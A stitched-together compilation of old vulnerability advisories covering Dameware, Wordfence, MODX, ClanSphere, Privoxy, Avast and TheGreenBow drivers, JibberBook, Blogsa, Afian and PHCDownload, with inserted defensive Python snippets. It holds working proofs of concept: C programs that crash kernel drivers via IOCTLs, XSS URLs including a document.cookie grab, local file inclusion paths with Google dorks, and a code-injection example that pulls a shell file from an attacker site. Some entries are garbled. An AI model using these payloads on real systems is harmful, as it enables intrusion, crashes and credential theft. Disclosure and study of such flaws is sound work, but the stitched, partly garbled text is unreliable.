[CVE-2016-2345] Solarwinds Dameware Mini Remote Control Remote Code Execution Vulnerability
Document Title:
===
Solarwinds Dameware Mini Remote Control Remote Code Execution Vulnerability

References (Source):
===
http://www.kb.cert.org/vuls/id/897144
https://www.securifera.com/advisories/cve-2016-2345
http://www.dameware.com/products/mini-remote-control/product-overview.aspx

Release Date:
=
2016-03-17

Product & Service Introduction:
===
Solarwinds Dameware Mini Remote Control allows for the remote administration of client systems of various operating systems and architectures.

Vulnerability Information:
==
Class: CWE-121: Stack-based Buffer Overflow
Impact: Remote Code Execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2016-2345

Vulnerability Description:
==
A certain remote message parsing function inside the Dameware Mini Remote Control service does not properly validate the input size of an incoming string before passing it to wsprintfw. As a result, a specially crafted message can overflow into the bordering format field and subsequently overflow the stack frame. Exploitation of this vulnerability does not require authentication and can lead to SYSTEM level privilege on any system running the dwmrcs daemon.

Vulnerability Disclosure Timeline:
==
2015-12-17: Contact Solarwinds and Request Security Contact Info From Support Team
2015-12-22: Vendor Sends Link to Recent Patches, Denies Security Contact Info Request
2015-12-29: Notify Vendor Patches Are Unrelated, Offer POC, & Request Contact with Security Team Again
2016-12-31: Vendor Replies That Details Were Forwarded To Developers Although None Have Been Requested Or Given Yet
2016-01-08: Follow-up with Vendor; Send POC for Developers
2016-01-08: Vendor Confirms Receipt of POC & Forwards to Developers
2016-01-20: Enlist US-CERT Assistance with Vendor
2016-01-20: Vendor Asks If We Will Test A Patch; We Confirm With Vendor
2016-02-04: Follow-Up with Vendor to Receive Patch
2016-02-04: Vendor Sends Patch
2016-02-04: Notify Vendor Patch Consists of an NX Recompile. Notify Vendor of Workarounds & Urge For Actual Fix. Request Contact Info For Developers Again
2016-02-04: Vendor Forwards to Developers
2016-02-14: Update US-CERT on Progress. They Attempt to Contact Vendor Security Team Independently
2016-03-03: Follow-up With Vendor
2016-03-03: Vendor Requests Remote Access to Our System
2016-03-04: Request Denied. We Suggest Several Trivial Potential Fixes For Vulnerability & Notify Of Impending 90 Disclosure Date
2016-03-08: Vendor Forwards to Developers
2016-03-17: Coordinated Public Disclosure with US-CERT

Affected Product(s):
===
Solarwinds Dameware Mini Remote Control 12.0 ( previous versions have not been verified )

Severity Level:
===
High

Proof of Concept (PoC):
===
A proof of concept will not be provided at this time.

Solution - Fix & Patch:
===
There is currently no patch. Please block remote access to port 6129 at a minimum.

Security Risk:
==
The security risk of this remote code execution vulnerability is estimated as high. (CVSS 10.0)

Credits & Authors:
==
Securifera, Inc - b0yd

Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty. Securifera disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Securifera is not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Securifera or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, or hack into any systems.

Domains: www.securifera.com
Contact: contact [at] securifera [dot] com
Social: twitter.com/securifera

Copyright © 2016 | Securifera, Inc
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting
WordPress Wordfence Firewall plugin version 5.1.2 suffers from a cross site scripting vulnerability.

===
Product: Wordfence Firewall Plugin For Wordpress
Vendor: Wordfence
Vulnerable Version(s): 5.1.2
Tested Version: 5.1.2
Advisory Publication: June 30, 2014 [without technical details]
Vendor Notification: June 24, 2014
Vendor Patch: June 29, 2014
Public Disclosure: June 30, 2014
Vulnerability Type: Reflected Cross-Site Scripting
CVE Reference: CVE-2014-4664
Risk Level: High
Solution Status: Fixed by Vendor
---
Reported By - Narendra Bhati ( R00t Sh3ll)
Security Analyst @ Suma Soft Pvt. Ltd. ( IT Risk & Security Management Services , Pune ( India)
Facebook - https://facebook.com/narendradewsoft
twitter - https://www.twitter.com/NarendraBhatiNB
Blog - http://hacktivity.websecgeeks.com
Email - bhati.cont...@gmail.com
---

Advisory Details:

Narendra Bhati discovered a vulnerability in Wordfence Firewall Plugin For Wordpress, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

1) Reflected Cross-Site Scripting (XSS) in Wordfence Firewall Plugin For Wordpress : CVE-2014-4664

The vulnerability exists due to insufficient sanitization of input data passed via the "whoisval" HTTP GET parameter to the "http://127.0.0.1/wp-admin/admin.php?page=WordfenceWhois&whoisval=" URL. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

This vulnerability can be used against a website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over the web application.

The exploitation example below uses the "";alert(/Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)" JavaScript function to display the "Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence" text:

http://127.0.0.1/wp-admin/admin.php?page=WordfenceWhois&whoisval=";;alert(/Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)

---
Solution:
Update to "5.1.4" from the official website or update from the wordpress dashboard

More Information:
Vendor Public Advisory http://www.wordfence.com/blog/2014/06/security-fix-wordfence-5-1-4/
Full Disclosure With Technical Details - http://hacktivity.websecgeeks.com/word-press-firewall-plugin-xss/
---
Modx CMS CSRF Bypass & XSS Vulnerabilities
Public Disclosure - http://hacktivity.websecgeeks.com/modx-csrf-and-xss/

===
Product: MODX Revolution
Severity: Critical
Versions: 2.0.0 - 2.2.14
Vulnerability type: CSRF & XSS
Report date: 2014-Jul-10
Fixed date: 2014-Jul-15

Description

A significant vulnerability was discovered in the Manager login of MODX Revolution that also affects the use of the Login Extra. A malicious user could formulate a link that automatically logs the user into their own account, then redirects the user to a site the attacker controls immediately, exposing the user's CSRF token. This can be exploited with or without getting the user to enter their credentials in the form.

Affected Releases

All MODX Revolution releases prior to and including 2.2.14.

Solution

Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions.
[HTTPCS] ClanSphere 'where' Cross Site Scripting Vulnerability
HTTPCS Advisory : HTTPCS127
Product : ClanSphere
Version : 2011.4
Date : 2014-03-07
Criticality level : Less Critical

Description :
A vulnerability has been discovered in ClanSphere, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the 'where' parameter to '/index.php' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Page : /index.php
Variables : sort=6&action=list&where=[VulnHTTPCS]&mod=users
Type : XSS
Method : GET
Solution :
References : https://www.httpcs.com/advisory/httpcs127
Credit : HTTPCS [Web Vulnerability Scanner]
___
https://www.httpcs.com/en/advisories
___
Twitter : http://twitter.com/HTTPCS
Web vulnerability scanner HTTPCS : https://www.httpcs.com/
Privoxy Proxy Authentication Credential Exposure - CVE-2013-2503
Privoxy Proxy Authentication Credential Exposure

Product: Privoxy
Project Homepage: privoxy.org
Advisory ID: c22-2013-01
Vulnerable Version(s): 3.0.20 (and possibly prior)
Tested Version: 3.0.20-1 (tested using Debian Sid)
Vendor Notification: March 6, 2013
Public Disclosure: March 11, 2013
Vulnerability Type: Insufficiently Protected Credentials [CWE-522]
CVE Reference: CVE-2013-2503
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )

Advisory Details:

During research into browser and proxy server handling of HTTP Response Codes, an issue with the way that Privoxy handles HTTP Response code 407 "Proxy Authentication Required" was discovered.

Privoxy in versions 3.0.20 (and possibly prior) ignores the presence of "Proxy-Authenticate" and "Proxy-Authorization" headers and allows these values to be passed to and from a remote server without modification. The resulting behavior could allow a malicious website to spoof a Proxy-Authentication response appearing to originate from the Privoxy service. The Privoxy user will then be prompted for a username and password that appears to originate from the Privoxy software.

Scenario:

1) A Privoxy user visits a website using a browser of their choice
2) The remote website responds to the request with a 407 "Proxy Authentication Required" HTTP response code and the appropriate "Proxy-Authenticate: Basic" HTTP response header
3) This response is passed through the Privoxy service without modification to the user's browser
4) As the browser is configured to use a proxy server, the browser believes that the upstream proxy (Privoxy) has requested authentication and prompts the user for a username and password. This prompt states that the proxy server at "127.0.0.1:8118" requires authentication (this prompt may vary if Privoxy is running on a machine other than localhost and/or on a non-default port number)
5) If the user enters a username and password, the browser will send a request through Privoxy to the remote website with a "Proxy-Authorization: " HTTP request header (where XXX is a base64 encoded version of the username and password the user entered at the browser's proxy authentication prompt)
6) The remote website receives this header and can store or re-use these captured credentials

Proof of Concept:

http://c22.cc/POC/c22-2013-01.php

The above URL will respond with a "Proxy-Authenticate: basic" header when a request is received that does not contain a "Proxy-Authorization" header. This will prompt the user's browser to request a username/password from the user. If you enter a value in the username/password box and click ok, it will send a Base64 encoded version to the remote website (the server will display the response headers at the bottom of the resulting page under request headers; one of the values will be "Proxy-Authorization" with a base64 encoded version of the entered username/password).

For a full walkthrough it is suggested to capture this in your favourite packet capture program and walk through the requests to view the entire process.

Note --> The above POC does not store any data sent to the server, however it is suggested to use bogus credentials if testing this proof of concept.

Solution:

The following solution was suggested and implemented in Privoxy 3.0.21 stable.

Proxy authentication headers are removed unless the new directive enable-proxy-authentication-forwarding is used. Forwarding the headers potentially allows malicious sites to trick the user into providing it with login information.

References:

Privoxy 3.0.21 ChangeLog --> http://ijbswa.cvs.sourceforge.net/viewvc/ijbswa/current/ChangeLog?revision=1.188&view=markup

Vulnerability Timeline:

March 5, 2013 20:00 - Initial discovery of vulnerability
March 6, 2013 14:48 > Emailed Privoxy developer list to request a security contact
March 6, 2013 15:26 < Received response with dedicated security contact information
March 6, 2013 16:01 > Emailed details of the vulnerability to security contact
March 6, 2013 17:19 < Received response acknowledging issue. Fix indicated in upcoming release
March 6, 2013 18:38 > Acknowledged receipt of email and advised of updated CVSSv2 score
March 7, 2013 15:50 < Received response detailing proposed fix, including link to CVS check-in of new code
March 7, 2013 18:48 > Acknowledged receipt of email
March 9, 2013 16:54 > Emailed CVE number to security contact and requested information on release plans
March 10, 2013 14:28 < Received confirmation of release timeline
March 10, 2013 14:58 - Release of Privoxy 3.0.21 stable
March 11, 2013 07:45 - Release of advisory
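The header handling the 3.0.21 fix describes, modelled in Python as an added example (this is not Privoxy's code). It assumes headers are handled as (name, value) pairs, models the enable-proxy-authentication-forwarding directive as a boolean, and uses a constructed 407 exchange following the scenario above; the credential decode exists only to show what an origin would have received.

```python
import base64
from typing import Iterable, List, Optional, Tuple

Header = Tuple[str, str]

# Both headers belong to the proxy hop (RFC 7235); a proxy that does not
# itself authenticate clients has no reason to relay either of them.
PROXY_AUTH_HEADERS = frozenset({"proxy-authenticate", "proxy-authorization"})


def strip_proxy_auth_headers(headers: Iterable[Header],
                             enable_proxy_authentication_forwarding: bool = False) -> List[Header]:
    """Drop Proxy-Authenticate / Proxy-Authorization unless forwarding was
    explicitly enabled (the 3.0.21 default leaves it off)."""
    if enable_proxy_authentication_forwarding:
        return list(headers)
    return [(n, v) for n, v in headers if n.lower() not in PROXY_AUTH_HEADERS]


def origin_challenges_proxy_auth(status: int, headers: Iterable[Header]) -> bool:
    """Detection hook for proxy logs: an origin server that answers with 407 or
    a Proxy-Authenticate challenge is the pattern the advisory describes."""
    names = {n.lower() for n, _ in headers}
    return status == 407 or "proxy-authenticate" in names


def relay_response(status: int, headers: Iterable[Header],
                   forwarding: bool = False) -> Tuple[int, List[Header]]:
    """Origin -> proxy -> browser: filter the response headers before relaying."""
    return status, strip_proxy_auth_headers(headers, forwarding)


def relay_request(headers: Iterable[Header], forwarding: bool = False) -> List[Header]:
    """Browser -> proxy -> origin: filter the request headers before relaying."""
    return strip_proxy_auth_headers(headers, forwarding)


def credentials_reaching_origin(request_headers: Iterable[Header],
                                forwarding: bool = False) -> Optional[Tuple[str, str]]:
    """What the origin would learn from the relayed request: the decoded
    Basic credentials, or None when the proxy stripped the header."""
    for name, value in relay_request(request_headers, forwarding):
        if name.lower() == "proxy-authorization" and value.lower().startswith("basic "):
            user, _, password = base64.b64decode(value[6:]).decode("utf-8").partition(":")
            return user, password
    return None


# Constructed sample exchange (not captured traffic): step 2 of the scenario,
# a malicious origin pretending to be the proxy at 127.0.0.1:8118 ...
MALICIOUS_ORIGIN_RESPONSE = (407, [
    ("Content-Type", "text/html"),
    ("Proxy-Authenticate", 'Basic realm="127.0.0.1:8118"'),
])

# ... and step 5, the browser's retry after the user typed credentials.
BROWSER_RETRY_REQUEST = [
    ("Host", "poc.example"),
    ("Proxy-Authorization", "Basic " + base64.b64encode(b"alice:s3cret").decode("ascii")),
]

if __name__ == "__main__":
    print("challenge detected:", origin_challenges_proxy_auth(*MALICIOUS_ORIGIN_RESPONSE))
    print("relayed response:", relay_response(*MALICIOUS_ORIGIN_RESPONSE))
    print("origin receives (default):", credentials_reaching_origin(BROWSER_RETRY_REQUEST))
    print("origin receives (forwarding on):",
          credentials_reaching_origin(BROWSER_RETRY_REQUEST, forwarding=True))
```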
Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation
http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

=[Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation]

Author(s): Giuseppe 'Evilcry' Bonfa'
           AbdulAziz Hariri
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
         http://www.insight-tech.org
         http://evilcodecave.blogspot.com
         http://evilcodecave.wordpress.com

Copyright 2009 Giuseppe Bonfa'. All rights reserved.

***Disclosure Timeline***

Discover Date: -
PoC Code: porting C++ 26/09/2009
Vendor Notify: 26/09/2009
Vendor Reply: 15/09/2009
Vendor Fix: 15/10/2009

== Product Details: ==

Affected Product: Avast antivirus (other versions could be affected)
Product Version: 4.8.1356.0
Vulnerable Component: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)
Category: Local Denial of Service due to kernel memory corruption (BSOD)
          (untested) Local Privilege Escalation
Notes: Tested on XP Sp0-Sp2 fixed faulting process IExplorer 6

== Vulnerability Details: ==

Avast's aswRdr.sys Driver does not sanitize user supplied input (IOCTL) and this leads to a Kernel Heap Overflow that propagates on the system with a BSOD and potential risk of Privilege Escalation.

== Technical Details: ==

kd> !analyze -v

Bugcheck: BAD_POOL_HEADER
Arg1: 0020, a pool block header size is corrupt.
Arg2: 8136c618, The pool entry we were looking for within the page.
Arg3: 8136c778, The next pool entry.  <-- OVERWRITTEN HEADER
Arg4: 1a2c0001, (reserved)

POOL_ADDRESS:
unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8136c618

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f7c70a18 80543c86 0019 0020 8136c618 nt+0x21925
f7c70a68 804f388c 8136c620 81571de8 nt+0x6cc86
f7c70abc 804fcfbf 81571de8 f7c70b08 f7c70afc nt+0x1c88c
f7c70b0c 806d1c35 f7c70b24 nt+0x25fbf
f7c70b24 806d1861 badb0d00 81603548 hal+0x2c35
f7c70bb4 804f0498 81571de8 81348028 hal+0x2861
f7c70be8 f76ee9ad 81347ec8 81565740 nt+0x19498
f7c70c1c f76ee333 81347ec8 81571da8 81664e28 aswRdr+0x9ad
f7c70c58 805749d1 81347ec8 81571da8 81348028 aswRdr+0x333
f7c70d00 8056d33c 001c nt+0x9d9d1
f7c70d34 8053c808 001c nt+0x9633c
f7c70d64 7c91eb94 badb0d00 0012fee0 04040404 nt+0x65808
f7c70d68 badb0d00 0012fee0 04040404 04040404 0x7c91eb94
f7c70d6c 0012fee0 04040404 04040404 0xbadb0d00
f7c70d70 04040404 04040404 0x12fee0
f7c70d74 04040404 0x4040404
f7c70d78 0x4040404

== Proof of Concept: ==

Exploitation for Privilege Escalation is not Trivial but Possible

+---+
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
 *
 * Author(s): Giuseppe 'Evilcry' Bonfa'
 *            AbdulAziz Hariri
 * E-Mail: evilcry _AT_ gmail _DOT_ com
 * Website: http://evilcry.netsons.org
 *          http://evilcodecave.blogspot.com
 *          http://evilcodecave.wordpress.com
 *          http://evilfingers.com
 *
 * Disclosure Timeline: As specified in the Advisory.
 */

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
    WCHAR DeviceName[MAX_PATH];
    HANDLE hDevice;

    /* Windows 2000 and later expose device objects under the \\.\Global\ prefix */
    if ((GetVersion() & 0xFF) >= 5)
    {
        wcscpy(DeviceName, L"\\\\.\\Global\\");
    }
    else
    {
        wcscpy(DeviceName, L"\\\\.\\");
    }

    wcscat(DeviceName, DriverName);
    printf("Opening.. %S\n", DeviceName);

    hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFile() ERROR %d\n", GetLastError());
        return FALSE;
    }

    *lphDevice = hDevice;
    return TRUE;
}

int main()
{
    HANDLE hDev = NULL;
    DWORD Junk;

    if(!OpenDevice(L"aswRDR",&hDev))
    {
        printf("Unable to access aswMon");
        return(0);
    }

    /* 0x156 bytes of 'A' are handed to IOCTL 0x80002024 as both input and output buffer */
    char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (Buff)
    {
        memset(Buff, 'A', 0x156);
        DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);
        printf("DeviceIoControl Executed..\n");
    }
    else
    {
        printf("VirtualAlloc() ERROR %d\n", GetLastError());
    }

    return(0);
}
+---+

Credits:

Vulnerability found and advisory written by Giuseppe 'Evilcry' Bonfa' and AbdulAziz Hariri.

=== Disclaimer: ===

The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indir
Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.
Source: https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php

---[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
         http://evilcodecave.blogspot.com
         http://evilcodecave.wordpress.com
         http://evilfingers.com

***Disclosure Timeline***

Discover Date: Sep 13, 2009
PoC Code: Sep 13, 2009
Vendor Notify: Sep 15, 2009
Vendor Reply: Sep 15, 2009

After various mails about the publishing date were ignored, here is the Public Disclosure.

+--+
Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
          (untested) Local Privilege Escalation
+---+

--[Details]--->

Avast's aswMon2.sys Driver does not sanitize user supplied input (IOCTL) and this leads to a kernel memory corruption that propagates on the system with a BSOD and potential risk of Privilege Escalation.

00010F70 cmp     [ebp+arg_C], 288h    ; InBuff Len, no other checks performed
00010F77 jnz     loc_111AC
00010F7D mov     esi, [ebp+SourceString]
00010F80 cmp     [esi], ebx
00010F82 mov     [ebp+arg_C], ebx

Affected IOCTL is B2C80018
UNEXPECTED_KERNEL_MODE_TRAP_M (107f)
Transfer Type: METHOD_BUFFERED

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f76f3234 8053d251 f76f3250 f76f32a4 nt+0x600fa
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251
f76f3328 8052c793 41414141 f76f377c nt+0x55712
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793
.
f76f56d8 f7756a04 badb0d00 8055b256 nt+0x66251
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04
f76f5770 41414141 41414141 41414141 41414141 0x41414141
f76f5774 41414141 41414141 41414141 41414141 0x41414141
f76f5778 41414141 41414141 41414141 41414141 0x41414141
f76f577c 41414141 41414141 41414141 41414141 0x41414141
f76f5780 41414141 41414141 41414141 41414141 0x41414141
.

+---+
/* Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry _AT_ gmail _DOT_ com
 * Website: http://evilcry.netsons.org
 *          http://evilcodecave.blogspot.com
 *          http://evilfingers.com
 *
 * Vendor: Notified
 *
 * No L.P.E. for kiddies
 */

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
    WCHAR DeviceName[MAX_PATH];
    HANDLE hDevice;

    /* Windows 2000 and later expose device objects under the \\.\Global\ prefix */
    if ((GetVersion() & 0xFF) >= 5)
    {
        wcscpy(DeviceName, L"\\\\.\\Global\\");
    }
    else
    {
        wcscpy(DeviceName, L"\\\\.\\");
    }

    wcscat(DeviceName, DriverName);
    printf("Opening.. %S\n", DeviceName);

    hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFile() ERROR %d\n", GetLastError());
        return FALSE;
    }

    *lphDevice = hDevice;
    return TRUE;
}

int main()
{
    HANDLE hDev = NULL;
    DWORD Junk;

    if(!OpenDevice(L"aswMon",&hDev))
    {
        printf("Unable to access aswMon");
        return(0);
    }

    /* Exactly 0x288 bytes (the only length the driver checks) filled with 'A' */
    char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (Buff)
    {
        memset(Buff, 'A', 0x288);
        DeviceIoControl(hDev,0xB2C80018,Buff, 0x288,Buff,0x288,&Junk,(LPOVERLAPPED)NULL);
        printf("DeviceIoControl Executed..\n");
    }
    else
    {
        printf("VirtualAlloc() ERROR %d\n", GetLastError());
    }

    return(0);
}
+---+

Regards,
Giuseppe 'Evilcry' Bonfa'
TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local
Original Advisory Link: https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php

---[TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local Privilege Escalation]->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
         http://evilcodecave.blogspot.com
         http://evilcodecave.wordpress.com
         http://evilfingers.com
         http://malwareAnalytics.com [under construction]

Release Date: 15/08/2009

+-+
Product: TheGreenBow VPN Client 4.61.003 (other versions could be affected)
Affected Component: tgbvpn.sys
Category: Local Denial of Service (BSOD)
          (untested) Local Privilege Escalation
+-+

--[Details]--->

TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input (IOCTL) and this leads to a Driver Collapse that propagates on the system with a BSOD, and potential risk of Privilege Escalation.

Affected IOCTL is 0x8034
Transfer Type: METHOD_BUFFERED

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51
0x841d36a8

++
/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 *          http://evilcodecave.blogspot.com
 *          http://evilcodecave.wordpress.com
 *          http://evilfingers.com
 *          http://malwareAnalytics.com [under construction]
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    HANDLE hDevice;
    DWORD Junk;

    system("cls");
    printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");

    hDevice = CreateFileA("\\\\.\\tgbvpn", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n Unable to Device Driver\n");
        return EXIT_FAILURE;
    }

    /* Bogus buffer pointers 0x8001 / 0x8002 with zero lengths are passed to IOCTL 0x8034 */
    DeviceIoControl(hDevice, 0x8034,(LPVOID) 0x8001, 0, (LPVOID) 0x8002, 0, &Junk, (LPOVERLAPPED)NULL);

    return EXIT_SUCCESS;
}
++

Regards,
Giuseppe 'Evilcry' Bonfa'
www.EvilFingers.com
JibberBook GuestBook 2.3 Multiple Vulnerabilities
###
[»] Script:   [ JibberBook ]
[»] Language: [ PHP ]
[»] Website:  [ http://jibberbook.com ]
[»] Founder:  [ Onur YILMAZ aka DJR ]
[»] Site:     [ www.onuryilmaz.info ]
###

=== [ data source of comments disclosure (.xml file) ] ===
[»] [JibberBook]/data_layer/xml/comments.xml

=== [ output ] ===
127.0.0.1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 0

=== [ HTML Code Injection ] ===
[»] add new message

=== [ Google Dork ] ===
[»] "JibberBook created by"
###
Blogsa <= 1.0 Beta 3 XSS Vulnerability
###
# Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability
# Software Site: blogsa.net
# Discovered by: Onur YILMAZ aka DJR
# Blog: http://www.onuryilmaz.info
# E-mail: contactonuryilmazinfo
###

# XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText=alert(document.cookie)

# Screen
http://img14.imageshack.us/img14/7803/12371681.jpg

This message was sent using IMP, the Internet Messaging Program.
Afian Document Manager Local File Inclusion
Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides a Web-based interface for documents residing on the Web server's file system. This software has a security hole allowing attackers to download any files if they know the path.

Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com

Exploit:

Google Dork: Afian document manager

1. Bypass+Fullpath Disclosure:
http://site/path/css/includer.php?files=NOT_EXIST_FILE
It doesn't ask for a username/password and displays the full path.

2. Local File Inclusion: Read any files if you know the exact path_of_file
http://site/path/css/includer.php?files=PATH_TO_FILE
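A defensive counterpart to the includer.php behaviour described above, as an added example (not Afian's code): it closes the three reported issues, no authentication, full-path disclosure on a missing file, and inclusion of arbitrary paths. It assumes a hypothetical CSS includer whose "files" parameter is a comma-separated list of stylesheet names, and builds its own throwaway directory tree as a constructed fixture.

```python
import os
import tempfile
from typing import List, Tuple

# Error messages are fixed strings: never echo a resolved path back to the
# client, which is where the advisory's "Fullpath Disclosure" came from.
ERR_BAD_NAME = "rejected file name"
ERR_ESCAPE = "path escapes css directory"
ERR_MISSING = "no such stylesheet"


class IncluderError(ValueError):
    pass


def resolve_includes(base_dir: str, files_param: str) -> List[str]:
    """Map the 'files' parameter onto real paths strictly inside base_dir."""
    base = os.path.realpath(base_dir)
    resolved = []
    for name in files_param.split(","):
        name = name.strip()
        # Only relative names with the expected extension are even considered.
        if not name or os.path.isabs(name) or not name.endswith(".css"):
            raise IncluderError(ERR_BAD_NAME)
        path = os.path.realpath(os.path.join(base, name))
        # realpath collapses '..' and symlinks, so the containment check is
        # the one that stops PATH_TO_FILE-style traversal.
        if os.path.commonpath([base, path]) != base:
            raise IncluderError(ERR_ESCAPE)
        if not os.path.isfile(path):
            raise IncluderError(ERR_MISSING)
        resolved.append(path)
    return resolved


def serve_includes(base_dir: str, files_param: str, authenticated: bool) -> Tuple[int, str]:
    """Hypothetical request handler: (status, body) for GET includer?files=..."""
    if not authenticated:
        # The original endpoint answered without asking for credentials at all.
        return 401, "authentication required"
    try:
        paths = resolve_includes(base_dir, files_param)
    except IncluderError as exc:
        return 400, str(exc)
    parts = []
    for p in paths:
        with open(p, encoding="utf-8") as fh:
            parts.append(fh.read())
    return 200, "\n".join(parts)


def make_demo_dir() -> str:
    """Constructed fixture: <root>/css/site.css plus two files outside the css
    directory that a traversal attempt would target. Returns the css directory."""
    root = tempfile.mkdtemp()
    css = os.path.join(root, "css")
    os.mkdir(css)
    with open(os.path.join(css, "site.css"), "w", encoding="utf-8") as fh:
        fh.write("body{margin:0}")
    with open(os.path.join(root, "secret.css"), "w", encoding="utf-8") as fh:
        fh.write("/* not under css/ */")
    with open(os.path.join(root, "config.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php $db_pass = 'constructed'; ?>")
    return css


if __name__ == "__main__":
    css_dir = make_demo_dir()
    for req in ("site.css", "../config.php", "../secret.css", "missing.css"):
        print(req, "->", serve_includes(css_dir, req, authenticated=True))
```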
PHCDownload 1.1.0 Vulnerabilities
A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy. PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vulnerable file: search.php

Description: It is like remote file inclusion but you can run PHP code from the browser address. I don't know what it is called.

Exploit:
http://[site]/[path_to_script]/search.php
Input: "><

Example:
http://[site]/[path_to_script]/search.php?string=";>< http://attacker_site/SHELL_FILE";); ?>
PGP Desktop 9.0.6 Denial Of Service - ZeroDay
---
Advisory: PGP Desktop 9.0.6 Denial Of Service Vulnerability.

Version Affected: PGP Desktop 9.0.6 [Build 6060] (other versions could be affected)
Component Affected: PGPwded.sys
Release Date: 23 December, 2008

Description:
